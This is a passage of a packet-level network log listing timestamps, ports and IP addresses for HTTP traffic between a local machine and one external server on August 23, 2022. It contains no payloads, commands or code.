Aug 23, 2022 18:25:30.022897959 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.023789883 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.027723074 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.027762890 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.027786970 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.027812004 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.027862072 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.027900934 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.027942896 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.027983904 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.028007030 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.028029919 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.028052092 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.028074026 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.028095961 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.028172970 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.028196096 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.028217077 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.028352976 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.028378963 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.028400898 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.028424978 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.028448105 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.028469086 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.028526068 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.028548956 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.028573036 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.028604031 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.028707027 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.028729916 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.028750896 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.028769970 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.028788090 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.028795958 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.028805971 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.028827906 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.028851032 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.028871059 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.028892040 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.028914928 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.028935909 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.028980017 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.029002905 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.029025078 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.029047012 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.029068947 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.029090881 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.029112101 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.029134035 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.029155016 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.029172897 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.029189110 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.029206991 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.029254913 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.029277086 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.029299974 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.029321909 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.029345036 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.029366016 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.029386997 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.029408932 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.029431105 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.029453993 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.029512882 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.029535055 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.029607058 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.029628992 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.029650927 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.029711008 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.029745102 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.029974937 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.030019999 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.030070066 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.030106068 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.030144930 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.201268911 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.210258961 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.238900900 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.238931894 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.238949060 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.239372015 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.248030901 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.248066902 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.248090029 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.248114109 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.248136997 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.248162031 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.248184919 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.248207092 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.248230934 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.248285055 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.248320103 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.248368979 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.248394012 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.248419046 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.248419046 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.248524904 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.248581886 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.248661041 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.248687983 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.248763084 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.248816013 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.248842001 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.248866081 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.248897076 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.248938084 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.248975992 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.249012947 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.249054909 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.249093056 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.249138117 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.249176025 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.249219894 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.249245882 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.249284983 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.249335051 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.249404907 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.249455929 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.249525070 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.249561071 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.249588013 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.249614954 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.249701977 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.249730110 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.249757051 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.249785900 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.249907970 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.249936104 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.249977112 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.250000000 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.250021935 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.250057936 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.250085115 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.250111103 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.250184059 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.250211000 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.250237942 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.250263929 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.250289917 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.250319004 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.250343084 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.250345945 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.250371933 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.250400066 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.250426054 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.250452042 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.250478029 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.250504017 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.250530958 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.250555992 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.250612974 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.250649929 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.250698090 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.250777006 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.250799894 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.250840902 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.250860929 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.250863075 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.250886917 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.250907898 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.250910044 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.250930071 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.250932932 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.250956059 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.250958920 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.250978947 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.250989914 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.251003027 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.251025915 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.251027107 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.251044989 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.251049042 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.251071930 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.251091003 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.251095057 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.251116037 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.251117945 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.251141071 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.251142025 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.251163006 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.251164913 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.251185894 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.251194000 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.251213074 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.251235962 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.251310110 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.251312971 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.251336098 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.251385927 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.251414061 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.251437902 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.251460075 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.251483917 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.251633883 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.251662970 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.251689911 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.251718044 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.251764059 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.251790047 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.251813889 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.251862049 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.251960993 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.251988888 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.252015114 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.252044916 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.252074957 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.252103090 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.252129078 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.252156019 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.252187014 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.252214909 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.252239943 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.252266884 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.252290964 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.252331018 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.252350092 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.252374887 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.252382040 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.252398968 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.252428055 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.252434015 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.252473116 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.252496004 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.252528906 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.252545118 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.252553940 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.252568960 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.252580881 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.252593040 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.252616882 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.252650023 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.252654076 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.252684116 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.252728939 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.252779961 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.252809048 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.252834082 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.252845049 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.252866983 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.252871990 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.252897978 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.252904892 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.252928972 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.252959013 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.252963066 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.252990007 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.252990007 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.253019094 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.253046989 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.253056049 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.253073931 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.253086090 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.253103971 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.253113031 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.253130913 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.253139973 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.253156900 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.253186941 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.253195047 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.253213882 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.253223896 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.253249884 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.253271103 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.253298044 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.253329039 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.253356934 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.253384113 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.253410101 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.253437042 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.253462076 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.253488064 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.253509998 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.253537893 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.253567934 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.253592968 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.253618956 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.253644943 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.253676891 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.253701925 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.253730059 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.253757954 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.253786087 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.253817081 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.253845930 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.253869057 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.253873110 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.253894091 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.253916979 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.253926992 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.253941059 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.253952026 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.253964901 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.253984928 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.254004955 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.254009008 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.254030943 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.254034042 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.254056931 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.254060984 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.254101992 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.254132986 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.254159927 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.254189014 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.254218102 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.254250050 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.254282951 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.254308939 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.254312992 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.254347086 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.254376888 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.254409075 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.254436970 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.254467010 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.254499912 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.254532099 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.254559040 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.254586935 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.254617929 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.254647017 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.254671097 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.254694939 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.255323887 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.255734921 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.277234077 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.277292013 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.277317047 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.278383017 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.285937071 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.285974979 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.285998106 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.286014080 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.286027908 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.286046028 CEST	80	49943	88.198.122.116	192.168.2.3
